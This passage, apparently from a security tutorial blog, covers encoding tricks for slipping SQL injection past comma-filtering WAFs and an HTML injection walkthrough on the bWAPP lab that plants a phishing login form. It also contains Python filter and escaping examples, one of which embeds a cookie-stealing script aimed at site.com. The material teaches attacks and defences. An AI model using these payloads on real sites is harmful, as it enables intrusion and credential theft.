(select 1)a join (select 2)b join (select 3)c

# Method 4

Escaped encoding/URL encoding (sometimes referred to as percent-encoding) is a method of representing characters within a URL that may need special syntax handling to be interpreted correctly. This is achieved by encoding the character to be interpreted as a sequence of three characters: the percent character % followed by the two hexadecimal digits representing the octet code of the original character. For example, the US-ASCII character set represents a comma with octet code 44, or hexadecimal 2C. Thus its URL-encoded representation is %2C.

union select 1%2C 2%2C 3

# Method 5

We can replace the comma with %82.

union select 1%82 2%82 3

# Method 6

Sometimes this basic URL-encoding trick might not work; however, you can circumvent the WAF by double URL-encoding the blocked character(s). In the double-encoded form the % character in the original command is itself URL-encoded in the normal way (as %25), so the double-URL-encoded value of the comma (%2C) is %252C.

union select 1%252C 2%252C 3

Thanks for reading, guys. My next tutorial will be on bypassing white-space filtering. Keep sharing and learning 🙂
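Every method above gets past a rule that looks for a literal comma in a once-decoded parameter. The Python below is an added example, not from the original post, of the normalisation a filter should apply before matching: decode until the value stops changing, unwrap /*! ... */ version comments (MySQL executes their body), drop ordinary comments, collapse whitespace, and then match on the query shape (UNION SELECT, chained JOIN (SELECT ...)) rather than on the comma. The rule set, the function names and the sample inputs are constructed for the demonstration and follow the six methods in the post.

```python
import re
from urllib.parse import unquote

VERSION_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # /*!50000 body */ executes its body
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)          # /* body */ is discarded

# Query shapes to match after normalisation, instead of the comma itself.
SHAPES = [
    re.compile(r"\bunion\s+(all\s+)?select\b"),
    re.compile(r"\(\s*select\b[^)]*\)\s*\w*\s*join\s*\(\s*select\b"),
]


def canonicalize(raw, max_rounds=5):
    """Brings a parameter into the form the SQL parser would see: decode
    until stable, unwrap version comments, drop plain comments, fold
    whitespace, lowercase."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = VERSION_COMMENT.sub(r"\1", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def naive_flag(raw):
    """The rule the methods in the post get past: one round of decoding,
    comments removed, then a literal comma next to a union select."""
    value = PLAIN_COMMENT.sub("", unquote(raw)).lower()
    return "union select" in value and "," in value


def shape_flag(raw):
    """Normalise first, then match on structure."""
    value = canonicalize(raw)
    return any(rx.search(value) for rx in SHAPES)


# Constructed inputs following the six methods in the post.
SAMPLES = [
    "union select 1/*!,*/ 2/*!,*/ 3",
    "union select 1,CHAR(44), 2,CHAR(44), 3",
    "(select 1)a join (select 2)b join (select 3)c",
    "union select 1%2C 2%2C 3",
    "union select 1%82 2%82 3",
    "union select 1%252C 2%252C 3",
]


def compare_rules(samples=SAMPLES):
    """Returns [(input, naive verdict, shape verdict)] for each sample."""
    return [(s, naive_flag(s), shape_flag(s)) for s in samples]


if __name__ == "__main__":
    for raw, naive, shaped in compare_rules():
        print(f"naive={naive!s:5} shape={shaped!s:5} {raw}  ->  {canonicalize(raw)}")
```

Matching on the shape of the statement rather than on one character is what makes the rule survive the encoding variants: the decoded form of methods 4, 5 and 6 and the comment forms of method 1 all canonicalise to the same UNION SELECT, and method 3 has no comma at all.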

HTML Injection Step by Step For Begineers


Hello guys, hope you are doing well and practising. Today in this post we will discuss HTML injection and why HTML injection is risky.

What is HTML injection?
HTML injection (Hyper Text Markup Language injection) is a vulnerability which allows an attacker to inject malicious markup via a specific parameter. HTML injection is also referred to as virtual defacement of a web application.

The possible attack scenarios are demonstrated below:

  1. An attacker finds a vulnerable parameter and performs HTML injection.
  2. The attacker sets up phishing on the vulnerable website and sends an email to the victim.
  3. The user visits the page because of the trustworthy domain and enters a user ID and password, which are sent to the attacker's server.

So lets start ..

  1. First you need to find a website which is vulnerable to HTML injection. Here I am using the bWAPP lab.
  2. Here I have opened the page which is vulnerable to HTML injection. Just add your HTML code as shown below.

[screenshot: the bWAPP page with the HTML code entered in the vulnerable field]

3. As you can see, I added my simple <h1> ahmed </h1> code and it was executed.

4. Now let's try some more HTML tags such as bold, colour, background, etc.

[screenshot: the page restyled with basic HTML tags]

See the above image: I have modified its look using some basic tags. You can also perform an XSS attack using HTML injection, as shown in the image below.

[screenshot: an XSS payload executed through the same HTML injection point]

So let’s try to create a login form using this code.

<form action="http://127.0.0.1/login.php" method="POST">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login"></form>

Make any page you like, or add your deface page: change this code and change the location (the form's action) to your own.

<form action="http://127.0.0.1/login.php" method="POST">


[screenshot: the injected login form rendered on the vulnerable page]

Just login with any username and password and see what happens.

[screenshot: the credentials received by the form's action page]

This page is shown after the victim logs in 🙁 and we successfully got the ID and password.

Keep learning.. and injecting, but don't harm any site.
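The form payload in this post and the script payload in the cookie-stealing post above both depend on the parameter being written back into the page as markup. The Python below is an added example, not from either post, that passes payloads of the same shape through encoding appropriate to three output contexts (HTML text, a quoted attribute value, and a URL query parameter) and counts how many tags each rendering introduces beyond its own template. The payload strings, the template functions and their names are constructed for the demonstration.

```python
import html
import re
from urllib.parse import quote

# Constructed payloads with the shape of the ones shown in the HTML injection
# post and in the cookie-stealing post.
FORM_PAYLOAD = ('<form action="http://127.0.0.1/login.php" method="POST">'
                'Username: <input type="text" name="username"></form>')
SCRIPT_PAYLOAD = ("<script>location.href='http://www.site.com/xss.php?cookie='"
                  "+document.cookie;</script>")

TAG_RE = re.compile(r"<[^>]+>")


def render_vulnerable(term):
    """Writes the parameter back verbatim: any markup in it becomes part of
    the page, which is the injection point both posts use."""
    return f"<p>Results for {term}</p>"


def render_text(term):
    """HTML text context: escape &, <, > and both quote characters."""
    return f"<p>Results for {html.escape(term, quote=True)}</p>"


def render_attribute(term):
    """Quoted attribute context: the same escaping keeps the value from
    closing the quote and starting a new attribute or tag."""
    return f'<input type="text" name="search" value="{html.escape(term, quote=True)}">'


def render_url_param(term):
    """URL context: percent-encode everything outside the unreserved set so
    the value stays a single query parameter."""
    return f'<a href="/search?q={quote(term, safe="")}">search again</a>'


def markup_introduced(render, payload):
    """Number of tags in the rendered output beyond those in the template:
    zero means the payload was treated as data, not markup."""
    baseline = len(TAG_RE.findall(render("")))
    return len(TAG_RE.findall(render(payload))) - baseline


def survey(payload):
    """Runs one payload through every renderer; returns {name: tags added}."""
    renderers = (render_vulnerable, render_text, render_attribute, render_url_param)
    return {fn.__name__: markup_introduced(fn, payload) for fn in renderers}


if __name__ == "__main__":
    for name, payload in (("form", FORM_PAYLOAD), ("script", SCRIPT_PAYLOAD)):
        print(name, survey(payload))
```

The escaped output still contains the payload text, including document.cookie, so the user sees what was submitted; it simply no longer parses as a form or a script. Choosing the encoder by output context is the point: the text escaper would not be enough on its own inside an unquoted attribute or a JavaScript string.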